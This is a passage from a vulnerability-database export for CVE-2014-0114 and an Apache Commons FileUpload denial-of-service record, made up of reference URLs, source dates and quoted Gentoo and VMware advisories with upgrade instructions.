            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674017"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674016"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674339"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677449"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675496"
          },
          {
            "trust": 0.9,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676485"
          },
          {
            "trust": 0.9,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21677298"
          },
          {
            "trust": 0.9,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674613"
          },
          {
            "trust": 0.9,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676091"
          },
          {
            "trust": 0.9,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673878"
          },
          {
            "trust": 0.9,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673877"
          },
          {
            "trust": 0.9,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674113"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674905"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21679331"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680698"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037424"
          },
          {
            "trust": 0.9,
            "url": "http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15282.html"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680194"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677352"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037622"
          },
          {
            "trust": 0.9,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0114"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/vu/jvnvu96290700/index.html"
          },
          {
            "trust": 0.8,
            "url": "https://www.us-cert.gov/ics/recommended-practices"
          },
          {
            "trust": 0.8,
            "url": "https://www.us-cert.gov/ics/advisories/icsma-20-184-01"
          },
          {
            "trust": 0.8,
            "url": "https://www.fda.gov/medical-devices/digital-health/cybersecurity"
          },
          {
            "trust": 0.8,
            "url": "http://jvndb.jvn.jp/ja/contents/2014/jvndb-2014-002308.html"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0114"
          },
          {
            "trust": 0.6,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0114"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293@%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/df093c662b5e49fe9e38ef91f78ffab09d0839dea7df69a747dffa86@%3cdev.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/ebc4f019798f6ce2a39f3e0c26a9068563a9ba092cdf3ece398d4e2f@%3cnotifications.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/15fcdf27fa060de276edc0b4098526afc21c236852eb3de9be9594f3@%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3csolr-user.lucene.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/2ba22f2e3de945039db735cf6cbf7f8be901ab2537337c7b1dd6a0f0@%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/2454e058fd05ba30ca29442fdeb7ea47505d47a888fbc9f3a53f31d0@%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a@%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/8e2bdfabd5b14836aa3cf900aa0a62ff9f4e22a518bb4e553ebcf55f@%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/fda473f46e51019a78ab217a7a3a3d48dafd90846e75bd5536ef72f3@%3cnotifications.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/f3682772e62926b5c009eed63c62767021be6da0bb7427610751809f@%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c@%3ccommits.pulsar.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/31f9dc2c9cb68e390634a4202f84b8569f64b6569bfcce46348fd9fd@%3ccommits.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55@%3csolr-user.lucene.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/6b30629b32d020c40d537f00b004d281c37528d471de15ca8aec2cd4@%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/1565e8b786dff4cb3b48ecc8381222c462c92076c9e41408158797b5@%3ccommits.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/cee6b1c4533be1a753614f6a7d7c533c42091e7cafd7053b8f62792a@%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/65b39fa6d700e511927e5668a4038127432178a210aff81500eb36e5@%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/869c08899f34c1a70c9fb42f92ac0d043c98781317e0c19d7ba3f5e3@%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/080af531a9113e29d3f6a060e3f992dc9f40315ec7234e15c3b339e3@%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226@%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/4c3fd707a049bfe0577dba8fc9c4868ffcdabe68ad86586a0a49242e@%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/3f500972dceb48e3cb351f58565aecf6728b1ea7a69593af86c30b30@%3cissues.activemq.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3cdev.drill.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3cdev.drill.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/09981ae3df188a2ad1ce20f62ef76a5b2d27cf6b9ebab366cf1d6cc6@%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/42ad6326d62ea8453d0d0ce12eff39bbb7c5b4fca9639da007291346@%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/r75d67108e557bb5d4c4318435067714a0180de525314b7e8dab9d04e@%3cissues.activemq.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0@%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/d27c51b3c933f885460aa6d3004eb228916615caaaddbb8e8bfeeb40@%3cgitbox.activemq.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/084ae814e69178d2ce174cfdf149bc6e46d7524f3308c08d3adb43cb@%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/40fc236a35801a535cd49cf1979dbeab034b833c63a284941bce5bf1@%3cdev.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/r458d61eaeadecaad04382ebe583230bc027f48d9e85e4731bc573477@%3ccommits.dolphinscheduler.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/ffde3f266d3bde190b54c9202169e7918a92de7e7e0337d792dc7263@%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/c24c0b931632a397142882ba248b7bd440027960f22845c6f664c639@%3ccommits.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3@%3cdevnull.infra.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3cissues.drill.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/918ec15a80fc766ff46c5d769cb8efc88fed6674faadd61a7105166b@%3cannounce.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/098e9aae118ac5c06998a9ba4544ab2475162981d290fdef88e6f883@%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/88c497eead24ed517a2bb3159d3dc48725c215e97fe7a98b2cf3ea25@%3cdev.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/0efed939139f5b9dcd62b8acf7cb8a9789227d14abdc0c6f141c4a4c@%3cissues.activemq.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/0a35108a56e2d575e3b3985588794e39fbf264097aba66f4c5569e4f@%3cuser.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3csolr-user.lucene.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674379www-01.ibm.com/support/docview.wss?uid=swg21677335"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/c7e31c3c90b292e0bafccc4e1b19c9afc1503a65d82cb7833dfd7478@%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/aa4ca069c7aea5b1d7329bc21576c44a39bcc4eb7bb2760c4b16f2f6@%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5@%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3ccommits.druid.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/0340493a1ddf3660dee09a5c503449cdac5bec48cdc478de65858859@%3cdev.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/9b5505632f5683ee17bda4f7878525e672226c7807d57709283ffa64@%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/df1c385f2112edffeff57a6b21d12e8d24031a9f578cb8ba22a947a8@%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://www-01.ibm.com/support/docview.wss?uid=ibm10795183"
          },
          {
            "trust": 0.6,
            "url": "http://www.ibm.com/support/docview.wss?uid=ibm10872142"
          },
          {
            "trust": 0.6,
            "url": "https://issues.apache.org/jira/browse/beanutils-520"
          },
          {
            "trust": 0.6,
            "url": "https://www.mail-archive.com/announce@apache.org/msg05413.html"
          },
          {
            "trust": 0.6,
            "url": "https://www.ibm.com/support/docview.wss?uid=ibm10887121"
          },
          {
            "trust": 0.6,
            "url": "https://www.ibm.com/support/docview.wss?uid=ibm10957873"
          },
          {
            "trust": 0.6,
            "url": "https://www.ibm.com/support/docview.wss?uid=ibm10887119"
          },
          {
            "trust": 0.6,
            "url": "https://www.ibm.com/support/docview.wss?uid=ibm10887113"
          },
          {
            "trust": 0.6,
            "url": "https://www.ibm.com/support/docview.wss?uid=ibm10888007"
          },
          {
            "trust": 0.6,
            "url": "https://www.ibm.com/support/docview.wss?uid=ibm10887999"
          },
          {
            "trust": 0.6,
            "url": "https://www.ibm.com/support/docview.wss?uid=ibm10887973"
          },
          {
            "trust": 0.6,
            "url": "https://www.ibm.com/support/docview.wss?uid=ibm10888009"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/75922"
          },
          {
            "trust": 0.6,
            "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-dependent-libraries-affect-ibm-db2-leading-to-denial-of-service-or-privilege-escalation-3/"
          },
          {
            "trust": 0.6,
            "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-dependent-libraries-affect-ibm-db2-leading-to-denial-of-service-or-privilege-escalation-2/"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2019.2568/"
          },
          {
            "trust": 0.6,
            "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-dependent-libraries-affect-ibm-db2-leading-to-denial-of-service-or-privilege-escalation/"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2020.1427/"
          },
          {
            "trust": 0.6,
            "url": "https://www.ibm.com/support/pages/node/6494701"
          },
          {
            "trust": 0.6,
            "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-warehouse-has-released-a-fix-in-response-to-multiple-vulnerabilities-found-in-ibm-db2/"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2019.2355/"
          },
          {
            "trust": 0.6,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsma-20-184-01"
          },
          {
            "trust": 0.6,
            "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-identified-in-ibm-storediq/"
          },
          {
            "trust": 0.6,
            "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-have-been-identified-in-db2-that-affect-the-ibm-performance-management-product/"
          },
          {
            "trust": 0.6,
            "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ibm-db2-and-ibm-java-runtime-affect-ibm-spectrum-protect-server/"
          },
          {
            "trust": 0.6,
            "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-open-source-used-in-ibm-cloud-pak-system/"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2020.2293.2/"
          },
          {
            "trust": 0.6,
            "url": "http://www.ibm.com/support/docview.wss?uid=ibm10879093"
          },
          {
            "trust": 0.6,
            "url": "https://www-01.ibm.com/support/docview.wss?uid=ibm10872142"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/78218"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2019.3134/"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2022072128"
          },
          {
            "trust": 0.6,
            "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-planning-analytics-workspace-is-affected-by-security-vulnerabilities-3/"
          },
          {
            "trust": 0.3,
            "url": "http://struts.apache.org/"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674379"
          },
          {
            "trust": 0.3,
            "url": "www-01.ibm.com/support/docview.wss?uid=swg21677335"
          },
          {
            "trust": 0.2,
            "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
          },
          {
            "trust": 0.2,
            "url": "https://bugzilla.redhat.com/):"
          },
          {
            "trust": 0.2,
            "url": "https://access.redhat.com/security/team/contact/"
          },
          {
            "trust": 0.2,
            "url": "https://access.redhat.com/security/updates/classification/#important"
          },
          {
            "trust": 0.1,
            "url": "http://www.mandriva.com/en/support/security/"
          },
          {
            "trust": 0.1,
            "url": "http://www.mandriva.com/en/support/security/advisories/"
          },
          {
            "trust": 0.1,
            "url": "http://www.openwall.com/ove/"
          },
          {
            "trust": 0.1,
            "url": "https://rhn.redhat.com/errata/rhsa-2014-0474.html"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/security/team/key/#package"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/site/articles/11258"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2014-0114.html"
          },
          {
            "trust": 0.1,
            "url": "http://creativecommons.org/licenses/by-sa/2.5"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0114"
          },
          {
            "trust": 0.1,
            "url": "https://security.gentoo.org/"
          },
          {
            "trust": 0.1,
            "url": "https://bugs.gentoo.org."
          },
          {
            "trust": 0.1,
            "url": "https://issues.jboss.org/):"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/security/cve/cve-2014-0114"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.amq.broker\u0026version=7.5.0"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/documentation/en-us/red_hat_amq/7.5/"
          },
          {
            "trust": 0.1,
            "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/"
          },
          {
            "trust": 0.1,
            "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/"
          },
          {
            "trust": 0.1,
            "url": "http://www.hp.com/jp/icewall_patchaccess"
          },
          {
            "trust": 0.1,
            "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins"
          },
          {
            "trust": 0.1,
            "url": "http://h30499.www3.hp.com/t5/hp-security-research-blog/protect-your-struts1-a"
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "67121"
          },
          {
            "db": "PACKETSTORM",
            "id": "126692"
          },
          {
            "db": "PACKETSTORM",
            "id": "149050"
          },
          {
            "db": "PACKETSTORM",
            "id": "126525"
          },
          {
            "db": "PACKETSTORM",
            "id": "137980"
          },
          {
            "db": "PACKETSTORM",
            "id": "154792"
          },
          {
            "db": "PACKETSTORM",
            "id": "126811"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-581"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006468"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-000056"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0114"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0114",
            "ident": null
          },
          {
            "db": "BID",
            "id": "67121",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "126692",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "149050",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "126525",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "137980",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "154792",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "126811",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-581",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006468",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-000056",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0114",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2014-04-30T00:00:00",
            "db": "VULMON",
            "id": "CVE-2014-0114",
            "ident": null
          },
          {
            "date": "2014-04-29T00:00:00",
            "db": "BID",
            "id": "67121",
            "ident": null
          },
          {
            "date": "2014-05-19T03:19:48",
            "db": "PACKETSTORM",
            "id": "126692",
            "ident": null
          },
          {
            "date": "2018-08-23T17:19:18",
            "db": "PACKETSTORM",
            "id": "149050",
            "ident": null
          },
          {
            "date": "2014-05-07T15:04:23",
            "db": "PACKETSTORM",
            "id": "126525",
            "ident": null
          },
          {
            "date": "2016-07-20T18:29:00",
            "db": "PACKETSTORM",
            "id": "137980",
            "ident": null
          },
          {
            "date": "2019-10-10T14:43:55",
            "db": "PACKETSTORM",
            "id": "154792",
            "ident": null
          },
          {
            "date": "2014-05-27T16:17:39",
            "db": "PACKETSTORM",
            "id": "126811",
            "ident": null
          },
          {
            "date": "2014-04-30T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201404-581",
            "ident": null
          },
          {
            "date": "2020-07-09T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-006468",
            "ident": null
          },
          {
            "date": "2014-06-17T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2014-000056",
            "ident": null
          },
          {
            "date": "2014-04-30T10:49:03.973000",
            "db": "NVD",
            "id": "CVE-2014-0114",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2023-02-13T00:00:00",
            "db": "VULMON",
            "id": "CVE-2014-0114",
            "ident": null
          },
          {
            "date": "2019-07-17T07:00:00",
            "db": "BID",
            "id": "67121",
            "ident": null
          },
          {
            "date": "2023-04-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201404-581",
            "ident": null
          },
          {
            "date": "2020-09-01T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-006468",
            "ident": null
          },
          {
            "date": "2015-01-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2014-000056",
            "ident": null
          },
          {
            "date": "2025-04-12T10:46:40.837000",
            "db": "NVD",
            "id": "CVE-2014-0114",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "126692"
          },
          {
            "db": "PACKETSTORM",
            "id": "149050"
          },
          {
            "db": "PACKETSTORM",
            "id": "126525"
          },
          {
            "db": "PACKETSTORM",
            "id": "137980"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-581"
          }
        ],
        "trust": 1.0
      },
      "title": {
        "_id": null,
        "data": "OpenClinic\u00a0GA\u00a0 Multiple vulnerabilities in",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006468"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "input validation error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-581"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201404-0585

    Vulnerability from variot - Updated: 2026-03-09 21:05

    MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions. Apache Commons FileUpload is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause the application to enter an infinite loop which may cause denial-of-service conditions. The following products are vulnerable: Apache Commons FileUpload 1.0 through versions 1.3 Apache Tomcat 8.0.0-RC1 through versions 8.0.1 Apache Tomcat 7.0.0 through versions 7.0.50. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201412-29


                                            http://security.gentoo.org/
    

    Severity: Normal Title: Apache Tomcat: Multiple vulnerabilities Date: December 15, 2014 Bugs: #442014, #469434, #500600, #511762, #517630, #519590 ID: 201412-29


    Synopsis

    Multiple vulnerabilities have been found in Apache Tomcat, the worst of which may result in Denial of Service.

    Affected packages

    -------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
    -------------------------------------------------------------------
    

    1 www-servers/tomcat < 7.0.56 *>= 6.0.41 >= 7.0.56

    Description

    Multiple vulnerabilities have been discovered in Tomcat. Please review the CVE identifiers referenced below for details.

    Resolution

    All Tomcat 6.0.x users should upgrade to the latest version:

    # emerge --sync # emerge --ask --oneshot --verbose ">=www-servers/tomcat-6.0.41"

    All Tomcat 7.0.x users should upgrade to the latest version:

    # emerge --sync # emerge --ask --oneshot --verbose ">=www-servers/tomcat-7.0.56"

    References

    [ 1 ] CVE-2012-2733 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2733 [ 2 ] CVE-2012-3544 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3544 [ 3 ] CVE-2012-3546 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3546 [ 4 ] CVE-2012-4431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4431 [ 5 ] CVE-2012-4534 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4534 [ 6 ] CVE-2012-5885 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5885 [ 7 ] CVE-2012-5886 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5886 [ 8 ] CVE-2012-5887 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5887 [ 9 ] CVE-2013-2067 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2067 [ 10 ] CVE-2013-2071 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2071 [ 11 ] CVE-2013-4286 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4286 [ 12 ] CVE-2013-4322 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4322 [ 13 ] CVE-2013-4590 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4590 [ 14 ] CVE-2014-0033 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0033 [ 15 ] CVE-2014-0050 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0050 [ 16 ] CVE-2014-0075 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0075 [ 17 ] CVE-2014-0096 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0096 [ 18 ] CVE-2014-0099 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0099 [ 19 ] CVE-2014-0119 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0119

    Availability

    This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

    http://security.gentoo.org/glsa/glsa-201412-29.xml

    Concerns?

    Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

    License

    Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

    The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

    http://creativecommons.org/licenses/by-sa/2.5 . Summary

    VMware has updated vSphere third party libraries
    
    1. Relevant releases

      VMware vCenter Server 5.5 prior to Update 2

      VMware vCenter Update Manager 5.5 prior to Update 2

      VMware ESXi 5.5 without patch ESXi550-201409101-SG

    2. Problem Description

    a. vCenter Server Apache Struts Update

      The Apache Struts library is updated to address a security issue.
    
      This issue may lead to remote code execution after authentication.
    
      The Common Vulnerabilities and Exposures project (cve.mitre.org)
      has assigned the identifier CVE-2014-0114 to this issue.
    
    
      Column 4 of the following table lists the action required to
      remediate the vulnerability in each release, if a solution is 
      available.
    
      VMware         Product    Running Replace with/
      Product        Version    on        Apply Patch
      =============  =======    ======= =================
      vCenter Server 5.5       any         5.5 Update 2
      vCenter Server 5.1       any         Patch Pending
      vCenter Server 5.0       any         Patch Pending
    

    b.

      The Common Vulnerabilities and Exposures project (cve.mitre.org)
      has assigned the identifiers CVE-2013-4590, CVE-2013-4322, and 
      CVE-2014-0050 to these issues.
    
      Column 4 of the following table lists the action required to
      remediate the vulnerability in each release, if a solution is 
      available.
    
      VMware                 Product    Running    Replace with/
      Product                Version    on       Apply Patch
      =============          =======    =======    =================
      vCenter Server         5.5     any        5.5 Update 2
      vCenter Server         5.1     any        Patch Pending
      vCenter Server         5.0     any        Patch Pending
    

    c. Update to ESXi glibc package

      glibc is updated to address multiple security issues.
    
      The Common Vulnerabilities and Exposures project (cve.mitre.org)
      has assigned the identifiers CVE-2013-0242 and CVE-2013-1914 to 
      these issues.
    
      Column 4 of the following table lists the action required to
      remediate the vulnerability in each release, if a solution is 
      available.
    
      VMware         Product    Running  Replace with/
      Product        Version    on     Apply Patch
      =============  =======    =======  =================
      ESXi           5.5       any      ESXi550-201409101-SG
      ESXi           5.1       any      Patch Pending
      ESXi           5.0       any      Patch Pending
    

    d. vCenter and Update Manager, Oracle JRE 1.7 Update 55

      Oracle has documented the CVE identifiers that are addressed in 
      JRE 1.7.0 update 55 in the Oracle Java SE Critical Patch Update 
      Advisory of April 2014.
    
      Column 4 of the following table lists the action required to
      remediate the vulnerability in each release, if a solution is 
      available.
    
